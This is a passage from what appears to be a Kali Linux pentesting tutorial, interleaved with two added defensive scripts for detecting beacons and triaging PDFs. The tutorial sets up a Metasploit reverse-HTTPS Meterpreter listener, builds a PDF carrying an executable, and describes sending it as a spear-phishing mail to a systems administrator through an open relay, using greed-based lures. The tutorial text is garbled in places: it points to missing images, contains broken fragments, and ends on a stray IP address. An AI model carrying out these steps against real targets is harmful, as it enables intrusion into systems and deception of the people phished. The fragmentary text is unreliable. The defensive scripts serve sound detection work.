The Social Engineering Toolkit (SET) license agreement states that SET is designed purely for good and not evil. Any use of this tool for malicious purposes that are unauthorized by the owner of the network and equipment violates the terms of service (TOS) and license of this toolset. To find this tool, go through the menu Kali Linux | Exploitation Tools | Social Engineering Toolkit, or type setoolkit on the command line:
This is going to be a Metasploit reverse HTTP exploit, so there are a couple of steps that you have to put in place before using SET:
Start the Metasploit service. In Kali 1.x this took two steps, starting the service and then opening the Metasploit Framework Console; in Kali 2.0 both are done with one command at the command prompt, avoiding the GUI menu altogether:
msfconsole
Type the following commands at the msf command prompt, one per line:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.0.0.2
set LPORT 4343
exploit
The listener is an open running process, so the cursor does not return to the ready state. To confirm that the listener is active, we can run a port scan against it with Nmap:
On the other side, the listener responded to the Nmap scan and printed the data it received from the scan:
In the following diagram, we can see that the listener marks the source of the scan: all the scan requests are recorded as coming from 10.0.2.15, which is the internal IP of the Kali machine:
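Seen from the network side, the handler configured above is the other end of a connection the implant keeps re-opening: a reverse HTTPS payload calls back to LHOST:LPORT at a fixed interval, and a listener on an unusual port shows up as egress outside whatever the firewall allows. The following script is an added example for a defender, not code from the book or from Metasploit/SET; the firewall log lines, the egress allowlist and the detection thresholds are all constructed for the demonstration.

```python
"""Look at outbound-connection logs from the defender's side of the handler:
a reverse HTTPS implant calls its listener back at a fixed interval, and a
listener on an odd port shows up as egress outside the allowlist.
Added example, not part of the book or of Metasploit/SET; the log lines,
the allowlist and the thresholds are constructed."""
from collections import defaultdict
from datetime import datetime
import re
from statistics import mean, pstdev

# Constructed egress allowlist: only web and DNS may leave the network.
ALLOWED_PORTS = {80, 443, 53}

# Constructed iptables-style log lines (timestamp, direction, SRC, DST, DPT).
# 192.168.1.20 checks in with 10.0.2.15:443 every 60 s; 192.168.1.21 makes a
# single connection to a port that is not on the allowlist.
SAMPLE_LOG = """\
2016-03-01T10:00:00 OUT SRC=192.168.1.20 DST=198.51.100.10 DPT=443
2016-03-01T10:00:05 OUT SRC=192.168.1.20 DST=10.0.2.15 DPT=443
2016-03-01T10:01:05 OUT SRC=192.168.1.20 DST=10.0.2.15 DPT=443
2016-03-01T10:02:05 OUT SRC=192.168.1.20 DST=10.0.2.15 DPT=443
2016-03-01T10:03:05 OUT SRC=192.168.1.20 DST=10.0.2.15 DPT=443
2016-03-01T10:03:30 OUT SRC=192.168.1.21 DST=203.0.113.9 DPT=12234
2016-03-01T10:04:05 OUT SRC=192.168.1.20 DST=10.0.2.15 DPT=443
2016-03-01T10:07:00 OUT SRC=192.168.1.22 DST=198.51.100.10 DPT=80
"""

LINE_RE = re.compile(r"^(\S+) OUT SRC=(\S+) DST=(\S+) DPT=(\d+)$")


def parse_log(text: str) -> list:
    """Parse lines into (timestamp, src, dst, dport); unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, dport = m.groups()
            events.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return events


def unusual_ports(events, allowed=ALLOWED_PORTS) -> list:
    """Connections to ports outside the egress allowlist: what a whitelisting
    firewall would block, and what is worth alerting on if it is only logged."""
    return [(src, dst, dport) for _, src, dst, dport in events if dport not in allowed]


def beacons(events, min_hits=4, max_jitter=0.2) -> list:
    """Flows contacted at a near-constant interval: at least `min_hits`
    connections whose gaps deviate by at most `max_jitter` of the mean gap.
    Port 443 looks normal by its number; a regular cadence to one host does not."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in events:
        by_flow[(src, dst, dport)].append(ts)
    found = []
    for (src, dst, dport), times in by_flow.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            found.append({"src": src, "dst": dst, "port": dport,
                          "interval_s": round(avg), "hits": len(times)})
    return found


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("egress outside allowlist:", unusual_ports(evs))
    print("beaconing flows:", beacons(evs))
```

Real implants add jitter to their sleep time, which is why the check works on the spread of the gaps relative to the mean rather than on an exact interval; raise max_jitter or lower min_hits for noisier traffic, at the cost of more false positives.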
The malware we are going to create will be an executable file wrapped in a PDF file. This will be an attachment on an e-mail that is from a purportedly safe source, to an identified systems administrator in the target company. We will start with a review of the menu structure of SET.
The main menu has six entries and an exit cue:
Under Social-Engineering Attacks, there are eleven entries:
Using Spear-Phishing Attack Vectors, there are four options:
Since we are going to set up a persistent threat that lets us stay in command of the victim's machine, and have to overcome a user's possible reluctance to double-click an attachment, we have to create an irresistible Spear-Phishing mail piece. To do this properly, it is important to have done effective reconnaissance ahead of time.
Company address books and calendars are useful for creating the urgency needed to get an e-mail opened. Just like with marketing by e-mail, either legitimate or spammy, a spear-phishing e-mail title has to be interesting, intriguing, or frightening to the victim:
This e-mail is short, interesting, and can create urgency by greed. The attachment could be any of the following:
The Social Engineering Toolkit offers 21 possible payloads. Some of these will work better on Macintosh operating systems than on Windows systems. Most Windows workstations are not provisioned to handle RAR-compressed files. The choices are as follows:
Let's just choose the default, which is item 12. When you hit Enter, the next screen lets you use a doctored PDF file of your own devising, or use the built-in blank PDF. Choosing the second option, we see seven further options:
Since three of the options are going to run code that gets the victim machine to phone home to your Metasploit Framework Meterpreter tool, and you have been practicing with that tool, it might make sense to choose one of those as your evil payload. Let's choose option seven, Windows Meterpreter Reverse HTTPS.
When we type 7, we get several options. The listener's IP address is 10.0.2.15. Port 443 is the default here, but you can have the listener at any port on your listening device. 443 is the HTTPS port, so it would not look unusual by its number. Port 12234 would look unusual and might also be blocked if the firewall administrators are whitelisting approved ports and blacklisting all the others.
/root/.set/template.pdf directory. This is not what it does. The executable is set as legit.exe in this case. When you enter the name of the file, as in the following image, you need to use the full path:
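The attachment that comes out of this step is a PDF carrying an executable, which is exactly the shape a mail gateway or incident responder wants to catch before it reaches the administrator's inbox. The following triage script is an added example written from the defender's side; it is not code from the book or from SET. It looks for the PDF dictionary keys such a document needs (an embedded file, an action that runs on open, JavaScript, a launch action) and for a Windows PE header inside any stream. The two sample PDFs it builds are constructed fixtures for the demonstration, not real SET output.

```python
"""Triage a PDF e-mail attachment for the features a weaponised document
typically carries: an embedded file, an action that runs on open, JavaScript,
and a Windows executable (MZ header) hidden in a stream. Added example for
mail-gateway triage; not part of SET or the book. The sample PDFs are
constructed here and are not real SET output."""
import re
import zlib

# PDF dictionary keys worth flagging. /EmbeddedFile is how a PDF carries a
# second file (an .exe, for instance); /OpenAction and /AA run an action
# automatically; /Launch starts an external program; /JS and /JavaScript
# carry script. Presence is a signal for quarantine, not proof of malice.
SUSPICIOUS_KEYS = {
    b"/EmbeddedFile": "embedded file attachment",
    b"/Launch": "launch action (runs an external program)",
    b"/OpenAction": "action executed on open",
    b"/AA": "additional (automatic) actions",
    b"/JavaScript": "JavaScript",
    b"/JS": "JavaScript",
}

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def _decoded_streams(data: bytes) -> list:
    """Every stream body, inflated when it is FlateDecode-compressed
    (bodies with other filters, or none, are returned raw)."""
    bodies = []
    for m in STREAM_RE.finditer(data):
        raw = m.group(1)
        try:
            bodies.append(zlib.decompress(raw))
        except zlib.error:
            bodies.append(raw)
    return bodies


def _has_key(key: bytes, blob: bytes) -> bool:
    # Require a non-letter after the key so /JS does not match /JSfoo.
    return re.search(re.escape(key) + rb"(?![A-Za-z])", blob) is not None


def triage_pdf(data: bytes) -> dict:
    """Return {'findings': [...], 'quarantine': bool} for one attachment."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF (missing %PDF- header)")
    streams = _decoded_streams(data)
    # Search the object dictionaries plus the *decoded* stream contents, so
    # keys tucked inside compressed object streams are not missed, while raw
    # compressed bytes (which can contain anything) are left out.
    visible = STREAM_RE.sub(b"", data) + b"\n" + b"\n".join(streams)
    findings = sorted({desc for key, desc in SUSPICIOUS_KEYS.items()
                       if _has_key(key, visible)})
    if any(s.lstrip().startswith(b"MZ") for s in streams):
        findings.append("PE executable (MZ header) inside a stream")
    return {"findings": findings, "quarantine": bool(findings)}


def build_sample_pdf(embedded: bytes = b"") -> bytes:
    """Constructed fixture: a minimal PDF; when `embedded` is given it is
    stored Flate-compressed as an /EmbeddedFile and the catalog gets an
    /OpenAction, mirroring the shape of an executable-in-PDF attachment."""
    catalog = b"1 0 obj << /Type /Catalog /Pages 2 0 R"
    objs = [b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj"]
    if embedded:
        catalog += b" /OpenAction 4 0 R"
        body = zlib.compress(embedded)
        objs.append(b"3 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length "
                    + str(len(body)).encode() + b" >>\nstream\n"
                    + body + b"\nendstream\nendobj")
        objs.append(b"4 0 obj << /S /GoTo /D [2 0 R /Fit] >> endobj")
    catalog += b" >> endobj"
    return b"%PDF-1.4\n" + b"\n".join([catalog] + objs) + b"\n%%EOF\n"


if __name__ == "__main__":
    clean = build_sample_pdf()
    armed = build_sample_pdf(b"MZ\x90\x00 constructed fake executable, not real code")
    print("clean :", triage_pdf(clean))
    print("armed :", triage_pdf(armed))
```

The checks are deliberately byte-level rather than a full PDF parse: object streams, incremental updates and odd whitespace defeat naive parsers, and a gateway only needs a reliable "hold this one for a sandbox" decision. A clean document can legitimately carry an /OpenAction or an attachment, so the result is a quarantine flag, not a verdict.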
The mailer will use an open mail relay, if you have found one, a Gmail account, or any legitimate e-mail SMTP server. SET does not contain its own SMTP server. You might want to find a free e-mail service that you can use for this purpose, or use an open relay mail server.
SE Toolkit allows you to choose from several different tasty e-mail subjects for your phishing e-mail attack, and you can easily add new templates to customize the approach. The fourth choice in the list below is the one we just created:
<[email protected]> and sent the e-mail to <[email protected]>, and the send worked:
3.144.38.92